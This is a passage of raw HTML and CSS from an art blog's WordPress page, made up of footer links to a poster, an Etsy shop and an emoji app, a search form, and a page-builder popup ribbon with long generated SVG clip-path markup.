data-css="tve-u-16644429fbd" href="https://itunes.apple.com/us/app/artsy-emojis/id1273353695?mt=8" target="_blank"><strong>ARTSY EMOJIS</strong></a></p></div></div></div></div></div><div class="thrv_wrapper thrv-columns tcb-tablet-hidden tcb-desktop-hidden" data-css="tve-u-1664466cbab"><div class="tcb-flex-row tcb--cols--3"><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" style="" data-css="tve-u-166446aa3b0"><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/art-class-poster/"><img class="tve_image wp-image-15725" alt="" width="600" height="630" title="home_art_class_poster" data-id="15725" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_art_class_poster.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_class_poster.jpg 600w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_class_poster-381x400.jpg 381w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_class_poster-286x300.jpg 286w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_class_poster-350x368.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_class_poster-595x625.jpg 595w" sizes="(max-width: 600px) 100vw, 600px" /></a></span></div><div class="thrv_wrapper thrv_text_element" style="" data-css="tve-u-166446ae11f"><p style="text-align: center;"><strong></strong><a data-css="tve-u-166446aec3b" href="https://www.artbarblog.com/art-class-poster/"><strong>ART CLASS POSTER</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col" style=""><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166446afc19" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.etsy.com/shop/ArtBarShop/" target="_blank"><img class="tve_image wp-image-15703" alt="" width="286" height="300" title="home-Etsy" data-id="15703" src="//www.artbarblog.com/wp-content/uploads/2018/10/home-Etsy-286x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home-Etsy-286x300.jpg 286w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-Etsy-381x400.jpg 381w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-Etsy-350x368.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-Etsy-595x625.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-Etsy.jpg 600w" sizes="(max-width: 286px) 100vw, 286px" /></a></span></div><div class="thrv_wrapper thrv_text_element" style="" data-css="tve-u-166446b4c0e"><p style="text-align: center;"><strong></strong><a data-css="tve-u-166446b3917" href="https://www.etsy.com/shop/ArtBarShop/" target="_blank"><strong>ETSY</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166446b594b" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://itunes.apple.com/us/app/artsy-emojis/id1273353695?mt=8" target="_blank"><img class="tve_image wp-image-15702" alt="" width="286" height="300" title="home-Artsy_Emojis" data-id="15702" src="//www.artbarblog.com/wp-content/uploads/2018/10/home-Artsy_Emojis-286x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home-Artsy_Emojis-286x300.jpg 286w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-Artsy_Emojis-381x400.jpg 381w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-Artsy_Emojis-350x368.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-Artsy_Emojis-595x625.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-Artsy_Emojis.jpg 600w" sizes="(max-width: 286px) 100vw, 286px" /></a></span></div><div class="thrv_wrapper thrv_text_element" style="" data-css="tve-u-166446b6fc1"><p style="text-align: center;"><a data-css="tve-u-166446b808e" href="https://itunes.apple.com/us/app/artsy-emojis/id1273353695?mt=8" target="_blank"><strong>ARTSY EMOJIS</strong></a></p></div></div></div></div></div><div class="thrv_wrapper thrv_custom_html_shortcode" data-css="tve-u-1664409e69f" style=""><center><form class="search-form" itemprop="potentialAction" itemscope="" itemtype="https://schema.org/SearchAction" method="get" action="https://www.artbarblog.com/" role="search"><meta itemprop="target" content="https://www.artbarblog.com/?s={s}"><label class="search-form-label screen-reader-text" for="searchform-5bb74dd94d3d33.85070845">Search</label><input itemprop="query-input" type="search" name="s" id="searchform-5bb74dd94d3d33.85070845" placeholder="Search"><input type="submit" value="Search"></form></center></div><div class="thrv_wrapper thrv-page-section"> <div class="tve-page-section-out" data-css="tve-u-166440c038d"></div> <div class="tve-page-section-in tve_empty_dropzone" data-css="tve-u-166440bf212"><div class="thrv_wrapper thrv_text_element"><p data-css="tve-u-166443c2cf6" style="text-align: center;">COPYRIGHT © 2012 - 2018 ART BAR</p></div></div> </div></div></div> </div> </div> <!-- Instagram Feed JS --> <script type="text/javascript"> var sbiajaxurl = "https://www.artbarblog.com/wp-admin/admin-ajax.php"; </script> <style type="text/css" media="screen"> #simple-social-icons-2 ul li a, #simple-social-icons-2 ul li a:hover, #simple-social-icons-2 ul li a:focus { background-color: #ffffff !important; border-radius: 3px; color: #4f4f4f !important; border: 0px #ffffff solid !important; font-size: 12px; padding: 6px; } #simple-social-icons-2 ul li a:hover, #simple-social-icons-2 ul li a:focus { background-color: #ffffff !important; border-color: #ffffff !important; color: #4f4f4f !important; } #simple-social-icons-2 ul li a:focus { outline: 1px dotted #ffffff !important; }</style><div data-position="top" data-tl-type="ribbon" class="tl-state-root tve-leads-ribbon tve-tl-anim tve-leads-track-ribbon-1 tl-anim-slide_top"><div class="tl-style" id="tve_tcb2_fading-image-2-step-with-lightbox_m1" data-state="1" data-form-state=""><style type="text/css" class="tve_custom_style">@import url("//fonts.googleapis.com/css?family=Lato:400,700&subset=latin");@media (min-width: 300px){[data-css="tve-u-85bbb537ba15f6"] { padding: 0px !important; }[data-css="tve-u-65bbb537ba15f3"] > .tcb-flex-col > .tcb-col { justify-content: center; }[data-css="tve-u-75bbb537ba15f4"] { max-width: 85.1%; }[data-css="tve-u-05bbb537ba15b6"]::after { clear: both; }[data-css="tve-u-05bbb537ba15b6"] { box-shadow: none; border: none; padding: 0px !important; background-color: rgba(255, 255, 255, 0) !important; }[data-css="tve-u-15bbb537ba15ba"] { font-size: 14px; width: 14px; height: 14px; border: 1px solid rgb(0, 0, 0); border-radius: 50px; overflow: hidden; position: absolute; top: 5px; right: 10px; z-index: 7; padding: 6px !important; margin: 0px !important; }[data-css="tve-u-135bbb537ba15fc"] { margin-right: 0px !important; padding: 0px !important; }[data-css="tve-u-55bbb537ba15f1"] { border: none; float: none; width: 100%; max-width: 750px; margin: 0px auto !important; }[data-css="tve-u-65bbb537ba15f3"] { margin-left: -30px; flex-direction: row; padding: 0px !important; }[data-css="tve-u-65bbb537ba15f3"] > .tcb-flex-col { padding-left: 30px; }[data-css="tve-u-125bbb537ba15fb"] { max-width: 14.9%; }#tve_editor [data-css="tve-u-45bbb537ba15d8"] p, #tve_editor [data-css="tve-u-45bbb537ba15d8"] li, #tve_editor [data-css="tve-u-45bbb537ba15d8"] blockquote, #tve_editor [data-css="tve-u-45bbb537ba15d8"] address, #tve_editor [data-css="tve-u-45bbb537ba15d8"] h1, #tve_editor [data-css="tve-u-45bbb537ba15d8"] h2, #tve_editor [data-css="tve-u-45bbb537ba15d8"] h3, #tve_editor [data-css="tve-u-45bbb537ba15d8"] h4, #tve_editor [data-css="tve-u-45bbb537ba15d8"] h5, #tve_editor [data-css="tve-u-45bbb537ba15d8"] h6 { color: rgb(51, 51, 51); }[data-css="tve-u-105bbb537ba15f8"] strong { font-weight: 700 !important; }[data-css="tve-u-45bbb537ba15d8"] p, [data-css="tve-u-45bbb537ba15d8"] li, [data-css="tve-u-45bbb537ba15d8"] blockquote, [data-css="tve-u-45bbb537ba15d8"] address, [data-css="tve-u-45bbb537ba15d8"] h1, [data-css="tve-u-45bbb537ba15d8"] h2, [data-css="tve-u-45bbb537ba15d8"] h3, [data-css="tve-u-45bbb537ba15d8"] h4, [data-css="tve-u-45bbb537ba15d8"] h5, [data-css="tve-u-45bbb537ba15d8"] h6 { font-weight: normal !important; }[data-css="tve-u-45bbb537ba15d8"] strong { font-weight: 700; }[data-css="tve-u-25bbb537ba15bb"] { border: none; border-top-left-radius: 0px; overflow: hidden; border-bottom-left-radius: 0px; padding: 0px !important; margin-right: 0px !important; margin-top: 0px !important; }[data-css="tve-u-35bbb537ba15bd"] { clip-path: url("#clip-bottom-5u9uc4t2rbz31"); background-image: linear-gradient(rgb(245, 212, 25), rgb(245, 212, 25)) !important; background-size: auto !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-45bbb537ba15d8"] { max-width: 100%; min-height: 1px !important; }[data-css="tve-u-95bbb537ba15f7"] { max-width: 650px; float: none; padding: 0px !important; margin-bottom: 0px !important; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-105bbb537ba15f8"] { letter-spacing: 2px; font-weight: 400 !important; font-size: 16px !important; font-family: Lato !important; color: var(--tcb-color-2) !important; }[data-css="tve-u-105bbb537ba15f8"] { line-height: 1.2em !important; }[data-css="tve-u-145bbb537ba15fd"] { font-size: 34px; margin-left: auto; margin-right: auto; width: 34px; height: 34px; }#tve_editor [data-css="tve-u-145bbb537ba15fd"] > :first-child { color: var(--tcb-color-2); }}@media (max-width: 1023px){[data-css="tve-u-65bbb537ba15f3"] > .tcb-flex-col { padding-left: 20px; }[data-css="tve-u-45bbb537ba15d8"] { max-width: 751px; }[data-css="tve-u-95bbb537ba15f7"] { float: none; z-index: 3; position: relative; max-width: 368px; margin: 0px auto !important; padding: 0px !important; }[data-css="tve-u-55bbb537ba15f1"] { max-width: 100%; margin-top: 0px !important; margin-bottom: 0px !important; }#tve_editor [data-css="tve-u-105bbb537ba15f8"] { letter-spacing: 1px; font-size: 20px !important; }[data-css="tve-u-85bbb537ba15f6"] { padding: 0px !important; margin: 0px !important; }[data-css="tve-u-135bbb537ba15fc"] { padding: 0px !important; }[data-css="tve-u-65bbb537ba15f3"] .tcb-flex-col { flex-basis: 420px !important; }[data-css="tve-u-65bbb537ba15f3"] { flex-direction: row; margin-left: -20px; padding: 0px !important; }[data-css="tve-u-15bbb537ba15ba"] { font-size: 12px; width: 12px; height: 12px; top: 10px; right: 10px; margin: 0px !important; padding: 5px !important; }[data-css="tve-u-35bbb537ba15bd"] { clip-path: url("#clip-tablet-bottom-5u9uc4t2rbz31"); }}@media (max-width: 767px){[data-css="tve-u-65bbb537ba15f3"] > .tcb-flex-col { padding-left: 0px; }[data-css="tve-u-105bbb537ba15f8"] { line-height: 1.3em !important; }[data-css="tve-u-55bbb537ba15f1"] { max-width: 100%; margin-top: 0px !important; margin-bottom: 0px !important; }[data-css="tve-u-65bbb537ba15f3"] > .tcb-flex-col > .tcb-col { justify-content: center; min-height: 1px; }[data-css="tve-u-85bbb537ba15f6"] { padding: 0px !important; margin: 10px 0px 26px !important; }[data-css="tve-u-65bbb537ba15f3"] { flex-direction: column; margin-left: 0px; min-height: inherit; padding: 0px !important; }[data-css="tve-u-25bbb537ba15bb"] { padding: 0px !important; }[data-css="tve-u-35bbb537ba15bd"] { clip-path: url("#clip-mobile-bottom-5u9uc4t2rbz31"); }[data-css="tve-u-115bbb537ba15f9"] { color: rgb(65, 200, 90) !important; }#tve_editor [data-css="tve-u-105bbb537ba15f8"] { font-size: 19px !important; }[data-css="tve-u-95bbb537ba15f7"] { max-width: 85%; float: none; z-index: 3; position: relative; padding: 0px !important; margin: 0px auto !important; }}</style><style type="text/css" class="tve_user_custom_style">.tve-leads-conversion-object .thrv_heading h1,.tve-leads-conversion-object .thrv_heading h2,.tve-leads-conversion-object .thrv_heading h3{margin:0;padding:0}.tve-leads-conversion-object .thrv_text_element p,.tve-leads-conversion-object .thrv_text_element h1,.tve-leads-conversion-object .thrv_text_element h2,.tve-leads-conversion-object .thrv_text_element h3{margin:0}</style><style type="text/css" class="tve_global_style"></style><div class="tve-leads-conversion-object" data-tl-type="ribbon"><div class="tve_flt"><div id="tve_editor" class="tve_shortcode_editor"><div class="thrv-ribbon tve_no_drag tve_no_icons thrv_wrapper tve_editor_main_content tve_empty_dropzone" data-css="tve-u-05bbb537ba15b6"> <div class="thrv_wrapper thrv_icon tcb-icon-display tve_evt_manager_listen tve_et_click tve_ea_thrive_leads_form_close" data-css="tve-u-15bbb537ba15ba" data-tcb-events="__TCB_EVENT_[{&quot;a&quot;:&quot;thrive_leads_form_close&quot;,&quot;t&quot;:&quot;click&quot;}]_TNEVE_BCT__" data-float="1"> <svg class="tcb-icon" viewBox="0 0 30 32" data-name="close"> <path d="M0.655 2.801l1.257-1.257 27.655 27.655-1.257 1.257-27.655-27.655z"></path> <path d="M28.31 1.543l1.257 1.257-27.655 27.655-1.257-1.257 27.655-27.655z"></path> </svg> </div> <div class="thrv_wrapper thrv-page-section" data-css="tve-u-25bbb537ba15bb" style=""> <div class="tve-page-section-out" data-css="tve-u-35bbb537ba15bd" data-clip-id="5u9uc4t2rbz31"><svg width="0" height="0" class="tve-decoration-svg"><defs><clipPath id="clip-bottom-5u9uc4t2rbz31" class="decoration-clip clip-path-bottom" clipPathUnits="objectBoundingBox" data-screen="" decoration-type="none" pointer-width="5" pointer-height="5" style="zigzag" clip-path="url(#clip-left-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon></clipPath><clipPath id="clip-left-5u9uc4t2rbz31" class="decoration-clip clip-path-left" clipPathUnits="objectBoundingBox" data-screen="" pointer-width="1" pointer-height="76" style="curves" decoration-type="none" clip-path="url(#clip-right-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon><ellipse cx="0.76" cy="0.00475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.014249999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.02375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.03325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.042749999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.05225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.06175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.07125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.08075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09974999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.10925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.11875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.12825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.13774999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.14725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.15675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.16625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.17575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.18525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.19475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.20425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.21375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.22325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.23274999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.24225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.25175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.26125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.27075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.29925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.30874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.31825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.32775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.33725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.34675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.35625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.36574999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.37525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.38475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.39425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.40375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.41325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.42275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.43224999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.44175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.45125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.46075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.48924999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.49874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.50825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5177499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.52725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.53675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.54625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.55575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.56525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.57475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5842499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.59375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.60325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.61275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.62225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.63175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.64125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.6507499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.67925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.68875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.69825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.70775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7172499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.72675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.73625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.74575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.75525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7647499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.77425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.78375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.79325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.80275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.81225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.82175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8312499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.84075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.86925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.87875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.88825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8977499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.90725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.91675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.92625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.93575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.9452499999999999" rx="0.76" ry="0.004750"></ellipse></clipPath><clipPath id="clip-mobile-bottom-5u9uc4t2rbz31" class="decoration-clip clip-path-mobile-bottom" clipPathUnits="objectBoundingBox" data-screen="mobile-" decoration-type="none" pointer-width="5" pointer-height="5" style="zigzag" clip-path="url(#clip-mobile-left-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon></clipPath><clipPath id="clip-mobile-left-5u9uc4t2rbz31" class="decoration-clip clip-path-mobile-left" clipPathUnits="objectBoundingBox" data-screen="mobile-" pointer-width="1" pointer-height="76" style="curves" decoration-type="none" clip-path="url(#clip-right-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon><ellipse cx="0.76" cy="0.00475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.014249999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.02375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.03325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.042749999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.05225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.06175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.07125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.08075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09974999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.10925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.11875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.12825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.13774999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.14725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.15675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.16625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.17575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.18525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.19475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.20425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.21375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.22325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.23274999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.24225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.25175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.26125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.27075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.29925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.30874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.31825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.32775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.33725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.34675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.35625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.36574999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.37525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.38475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.39425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.40375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.41325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.42275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.43224999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.44175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.45125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.46075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.48924999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.49874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.50825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5177499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.52725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.53675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.54625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.55575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.56525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.57475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5842499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.59375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.60325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.61275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.62225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.63175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.64125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.6507499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.67925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.68875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.69825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.70775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7172499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.72675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.73625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.74575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.75525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7647499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.77425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.78375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.79325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.80275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.81225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.82175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8312499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.84075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85025" rx="0.76" 